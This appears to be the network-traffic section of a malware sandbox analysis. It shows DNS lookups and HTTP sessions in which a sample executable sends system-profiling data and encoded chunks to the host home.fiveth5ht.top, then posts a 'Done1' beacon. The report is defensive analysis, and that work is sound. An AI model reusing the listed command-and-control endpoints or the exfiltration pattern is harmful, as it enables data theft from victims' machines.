                                                        Dec 27, 2024 14:54:16.045031071 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045042992 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045068979 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045134068 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045206070 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045252085 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045353889 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045394897 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045453072 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045512915 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045663118 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045711040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045809031 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045821905 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045869112 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045881033 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045977116 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.045986891 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046092987 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046113014 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046216011 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046269894 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046312094 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046339989 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046403885 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046502113 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046514988 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046529055 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046605110 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046618938 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046708107 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046732903 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046801090 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046811104 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046914101 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.046933889 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047056913 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047066927 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047089100 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047125101 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047204971 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047228098 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047303915 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047329903 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047434092 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047452927 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047549963 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047621012 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047633886 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047699928 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.047712088 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048223972 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048291922 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048304081 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048337936 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048387051 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048460007 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048471928 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048571110 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048628092 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048701048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048713923 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048759937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048841000 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048856020 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048953056 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048968077 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.048980951 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049113989 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049127102 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049139977 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049153090 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049175978 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049189091 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049251080 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049277067 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049345970 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049360037 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049392939 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049420118 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049458981 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.049526930 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:18.569953918 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:18.570127964 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:18.570178032 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:18.570477962 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:18.689909935 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:18.772155046 CET4971380192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:18.891577959 CET80497135.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:18.891676903 CET4971380192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:18.892043114 CET4971380192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:19.011482954 CET80497135.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:20.326376915 CET80497135.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:20.326508045 CET80497135.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:20.326612949 CET4971380192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:20.327179909 CET4971380192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:20.446763039 CET80497135.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:20.526654005 CET4971480192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:20.646341085 CET80497145.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:20.646465063 CET4971480192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:20.646887064 CET4971480192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:20.766549110 CET80497145.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:22.313235044 CET80497145.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:22.313369036 CET80497145.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:22.313422918 CET4971480192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:22.313659906 CET4971480192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:22.433197975 CET80497145.101.3.217192.168.2.12

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 14:54:09.899434090 CET6011053192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:09.899596930 CET6011053192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:10.038453102 CET53601101.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:10.038923025 CET53601101.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:14.100169897 CET6011353192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:14.100292921 CET6011353192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:14.237833023 CET53601131.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:14.237884045 CET53601131.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:18.633910894 CET6011553192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:18.633971930 CET6011553192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:18.770946980 CET53601151.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:18.771270990 CET53601151.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:20.387744904 CET6011753192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:20.387866020 CET6011753192.168.2.121.1.1.1
                                                        Dec 27, 2024 14:54:20.525336981 CET53601171.1.1.1192.168.2.12
                                                        Dec 27, 2024 14:54:20.525383949 CET53601171.1.1.1192.168.2.12

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 27, 2024 14:54:09.899434090 CET192.168.2.121.1.1.10xde45Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:09.899596930 CET192.168.2.121.1.1.10x9436Standard query (0)httpbin.org28IN (0x0001)false
                                                        Dec 27, 2024 14:54:14.100169897 CET192.168.2.121.1.1.10xa70dStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:14.100292921 CET192.168.2.121.1.1.10xfe02Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                        Dec 27, 2024 14:54:18.633910894 CET192.168.2.121.1.1.10xbddStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:18.633971930 CET192.168.2.121.1.1.10x5345Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                        Dec 27, 2024 14:54:20.387744904 CET192.168.2.121.1.1.10x4c2dStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:20.387866020 CET192.168.2.121.1.1.10xfaaeStandard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 27, 2024 14:54:10.038453102 CET1.1.1.1192.168.2.120xde45No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:10.038453102 CET1.1.1.1192.168.2.120xde45No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:14.237833023 CET1.1.1.1192.168.2.120xa70dNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:18.770946980 CET1.1.1.1192.168.2.120xbddNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                        Dec 27, 2024 14:54:20.525383949 CET1.1.1.1192.168.2.120x4c2dNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • httpbin.org
                                                        • home.fiveth5ht.top

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.12497125.101.3.217807104C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 27, 2024 14:54:14.388747931 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 561895
                                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 31 38 32 31 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "8516589909667918211", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe" [TRUNCATED]
                                                        Dec 27, 2024 14:54:14.508819103 CET24720OUTData Raw: 7a 72 4d 63 57 42 31 4b 79 76 72 69 78 74 74 42 42 62 44 66 4b 43 4d 34 79 75 66 34 35 78 48 30 5c 2f 66 6f 6d 59 58 36 77 36 5c 2f 69 6c 69 6f 30 38 4c 69 4b 2b 45 72 34 69 50 68 7a 34 71 31 63 4c 44 45 59 61 62 70 31 71 61 78 64 4c 67 65 65 46
                                                        Data Ascii: zrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZOMk3\/XdD6B\/0rsTToVaPhVKcMTQpYminxt4cwqTo14RnSn7GfF8a0eeMk+WcIyV7Simmj8hKK\/X63\/4JOeILgkf8Ls0VCDgg+CL4kMP4T\/xUowcYPODyK\/MH4l+Cbn4a\/EPxt8Pru\/g
                                                        Dec 27, 2024 14:54:14.628552914 CET4944OUTData Raw: 30 58 36 30 53 5a 5a 5a 6e 5c 2f 64 35 38 72 79 75 66 2b 76 72 5c 2f 41 43 65 6c 42 30 46 61 54 6d 4e 6e 32 46 50 4d 34 48 39 44 2b 46 48 79 66 4a 73 68 32 52 5c 2f 36 52 5c 2f 7a 39 66 30 5c 2f 7a 2b 56 50 5c 2f 41 4f 57 6a 70 50 38 41 4a 36 52
                                                        Data Ascii: 0X60SZZZn\/d58ryuf+vr\/ACelB0FaTmNn2FPM4H9D+FHyfJsh2R\/6R\/z9f0\/z+VP\/AOWjpP8AJ6R5\/wBb\/nFQ+Y\/8SXP+t83\/AFv7j\/P0rb3\/AO7+IDMJ8\/zyf88pfM6Y\/wA\/570\/7vyfu\/L\/ANUcS+3+fbBoWQx722B3\/wBV\/wDr\/wA+9MaRPnd0t9\/bzOYKoBnmPId+y3\/d\/nN\/nuPf2p8m+
                                                        Dec 27, 2024 14:54:14.628607988 CET2472OUTData Raw: 5a 31 37 70 76 69 57 78 76 66 43 57 69 79 61 50 61 33 50 69 6e 78 58 38 65 76 46 48 37 4d 6b 76 68 53 77 31 65 47 36 31 6e 77 6e 38 62 66 44 4d 6d 68 79 4a 34 50 38 58 7a 6d 33 69 30 4f 78 67 38 53 36 50 72 31 76 34 6e 38 4a 2b 4a 4e 4a 31 6e 57
                                                        Data Ascii: Z17pviWxvfCWiyaPa3PinxX8evFH7MkvhSw1eG61nwn8bfDMmhyJ4P8Xzm3i0Oxg8S6Pr1v4n8J+JNJ1nW\/DWveGbLWdYtdV8jRtSFt+20PF\/w0ryhCPF2WUueXs4SxaxWBpSqQcYVqUK2Mw+Hoyq4OvUpYTMKUZupluOrYfAY+OGxuIo0J\/zdivAjxewtOVWpwJnNZRjUqTjgvqeZV404e0nGtLD5fisViFRxdCjiMbl9Z0
                                                        Dec 27, 2024 14:54:14.628632069 CET2472OUTData Raw: 73 66 41 64 6a 38 51 50 46 76 78 50 2b 46 66 77 7a 30 76 78 4c 71 5c 2f 69 6e 77 7a 38 4e 74 50 2b 49 2b 73 65 4f 62 44 55 76 69 74 34 74 38 45 2b 48 50 44 33 69 58 78 58 34 63 38 4a 33 48 67 33 34 63 2b 4f 76 44 33 68 36 58 52 62 62 78 68 34 4e
                                                        Data Ascii: sfAdj8QPFvxP+Ffwz0vxLq\/inwz8NtP+I+seObDUvit4t8E+HPD3iXxX4c8J3Hg34c+OvD3h6XRbbxh4Ns59f+LOvfDTwdNf+KbCO18STQad4kuND+ezjxC4LyCeYUs34hwOCr5VVy+hjsPL21XFUa+aRqzy+lHC0KVXEV6mKp0MRUpww9OrJUsPXqzUadGrKP1mQeF3H\/FEMpq5DwvmOYUM8hm1TLMTB4ejhMRTyKlQrZvVl
                                                        Dec 27, 2024 14:54:14.628715992 CET2472OUTData Raw: 69 38 72 77 4e 57 6d 70 59 48 45 34 69 4d 36 31 4c 47 5a 31 6c 65 47 71 30 49 4f 56 61 6c 57 78 6c 4f 45 34 52 63 61 6e 4a 2b 70 33 77 4b 5c 2f 77 43 43 73 50 78 6c 2b 41 48 77 6b 38 45 5c 2f 42 33 77 72 38 4e 76 68 62 72 47 67 2b 42 39 50 76 4c
                                                        Data Ascii: i8rwNWmpYHE4iM61LGZ1leGq0IOValWxlOE4RcanJ+p3wK\/wCCsPxl+AHwk8E\/B3wr8NvhbrGg+B9PvLDTtT8SReL59ZuxqGr6jrl1JePpXifSbE4vtUult0hsojFarBFK9xLHJcS+rH\/guD+0V\/D8JvgcPrY\/EFv5ePVr8V\/G80Hw+svihqmva14WmtfhD8ZfDXwV8XHRtW1LU\/8AiceOfBvinx58PvF2lXI0GDTb3w
                                                        Dec 27, 2024 14:54:14.628734112 CET2472OUTData Raw: 65 67 36 43 75 77 66 2b 35 38 6e 5c 2f 54 50 50 72 37 66 68 5c 2f 6e 4e 4d 62 50 66 31 48 54 5c 2f 58 39 4f 33 76 56 68 50 75 6a 38 66 35 6d 6f 70 49 5c 2f 77 43 5c 2f 5c 2f 77 42 74 66 38 39 65 35 5c 2f 79 42 51 61 66 57 66 36 74 5c 2f 39 71 4d
                                                        Data Ascii: eg6Cuwf+58n\/TPPr7fh\/nNMbPf1HT\/X9O3vVhPuj8f5mopI\/wC\/\/wBtf89e5\/yBQafWf6t\/9qM3H\/fPf\/6+P0qtJH833N7+b\/z1\/Tv\/AI9O1Wfu7N\/z8f6yP\/Uf5H50zb8z\/wAaf5\/P8+\/vyHTDb5\/oin867Ef05\/x7VCv8ec+Z\/wBNP8+uf\/1Vc2ff6u\/+fy\/LkVCsSbkTZs\/564zj+f8An6U
                                                        Dec 27, 2024 14:54:14.673825026 CET27192OUTData Raw: 78 5c 2f 2b 65 76 6d 44 38 5c 2f 78 78 5c 2f 6e 70 54 50 4d 66 61 2b 39 5c 2f 39 58 7a 45 5a 50 38 41 6e 33 5c 2f 36 64 4f 66 72 32 5c 2f 44 4e 41 44 50 6e 62 37 69 52 6f 6d 66 39 58 5c 2f 79 33 34 5c 2f 36 65 5c 2f 77 43 58 35 6d 6d 52 5c 2f 75
                                                        Data Ascii: x\/+evmD8\/xx\/npTPMfa+9\/9XzEZP8An3\/6dOfr2\/DNADPnb7iRomf9X\/y34\/6e\/wCX5mmR\/u9r\/ff8vJ\/L\/P0qeP8AdjenyP8A8su3+enf0qHy3+d+f8n6fqfz4oAjj3rsymzzP3X7z\/D\/AA\/WoWZIpP8Alp\/zy7+R9n\/rn+dWWk\/jQxu8mf3cn+fT\/PYsjjeONx9\/vLxQdBD8qbN\/l7P+ef8AL\/
                                                        Dec 27, 2024 14:54:14.789940119 CET7416OUTData Raw: 35 61 6f 55 6b 52 35 4f 6b 63 63 6e 2b 66 5c 2f 72 34 6f 4e 42 67 33 5c 2f 49 6a 2b 57 5c 2f 6d 53 6e 7a 66 4c 34 35 2b 76 34 66 34 31 43 30 66 6c 37 45 54 7a 48 53 53 4c 79 6f 59 2b 5c 2f 77 44 6e 2b 66 58 33 71 62 63 69 71 66 38 41 56 77 5c 2f
                                                        Data Ascii: 5aoUkR5Okccn+f\/r4oNBg3\/Ij+W\/mSnzfL45+v4f41C0fl7ETzHSSLyoY+\/wDn+fX3qbciqf8AVw\/uuPz7f9hEY\/zzTPLdtnz7Ek\/1p80\/pmg6CEqn8Hmf89ZZP+WH2gdc+9MMm6N+fn582OSLyP8A9fvT2V\/ub9n73\/ln\/qYfx\/pwOlMkY\/3Pn\/7\/AMGB\/n\/H0oKpdP8AD\/kPb93v+SPB\/wBVH\/n\/
                                                        Dec 27, 2024 14:54:14.953727961 CET1236OUTData Raw: 58 35 63 6d 7a 5c 2f 41 4a 36 66 38 39 4f 50 38 35 78 2b 48 72 54 4a 48 2b 58 7a 4a 45 33 35 5c 2f 77 43 57 6b 6e 5c 2f 31 76 62 5c 2f 50 65 72 6b 6e 79 5c 2f 37 6e 5c 2f 4c 4b 4f 57 4c 5c 2f 49 5c 2f 77 41 6d 6f 64 6e 33 45 32 62 4f 33 2b 66 38
                                                        Data Ascii: X5cmz\/AJ6f89OP85x+HrTJH+XzJE35\/wCWkn\/1vb\/Perkny\/7n\/LKOWL\/I\/wAmodn3E2bO3+f8\/wBcz7Pz\/D\/gnZ7Ty\/H\/AIBFJs+f\/V+3\/wBb3+veqv8Aqzv2Rv8A9NP+WB\/z\/h+Fw7P7+95P+Wkf\/X1j\/wDV79OtMaNI9++PZk\/6yTHP\/wBf0o9n5\/h\/wTSl9n5\/qUJJHZT\/AHBjyv5\/55o
                                                        Dec 27, 2024 14:54:15.153785944 CET1236OUTData Raw: 5c 2f 38 41 6c 68 42 62 5c 2f 77 43 66 77 78 39 61 44 53 6e 55 2b 56 76 77 5c 2f 77 43 42 76 30 31 49 64 76 33 34 64 5c 2f 79 65 62 2b 39 78 5c 2f 68 6e 72 5c 2f 6e 4f 4b 5a 35 69 65 58 4e 5c 2f 48 35 6e 37 71 58 38 66 58 72 5c 2f 6b 34 70 5c 2f
                                                        Data Ascii: \/8AlhBb\/wCfwx9aDSnU+Vvw\/wCBv01Idv34d\/yeb+9x\/hnr\/nOKZ5ieXN\/H5n7qX8fXr\/k4p\/zrGn8f7r9eM\/56U\/5G++0iZ\/dfJ+\/9v8P8aDYrf6zfJnf5n7qX975Hn9M\/5\/GmSR\/xuhdP+Wuf89RUzRw7U+SVP3v7qSSX9\/D\/APW\/yO9P\/wBWu\/8A0jf\/AMtd\/wBq8j\/D\/wCvmgCvJ\/20mT
                                                        Dec 27, 2024 14:54:18.569953918 CET157INHTTP/1.1 200 OK
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 27 Dec 2024 13:54:18 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Data Raw: 30
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.12497135.101.3.217807104C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 27, 2024 14:54:18.892043114 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Dec 27, 2024 14:54:20.326376915 CET372INHTTP/1.1 404 NOT FOUND
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 27 Dec 2024 13:54:20 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 207
                                                        Connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.12497145.101.3.217807104C:\Users\user\Desktop\dZsdMl5Pwl.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 27, 2024 14:54:20.646887064 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                        Host: home.fiveth5ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "0", "data": "Done1" }
                                                        Dec 27, 2024 14:54:22.313235044 CET372INHTTP/1.1 404 NOT FOUND
                                                        Server: nginx/1.22.1
                                                        Date: Fri, 27 Dec 2024 13:54:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 207
                                                        Connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                        Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                        HTTPS Proxied Packets

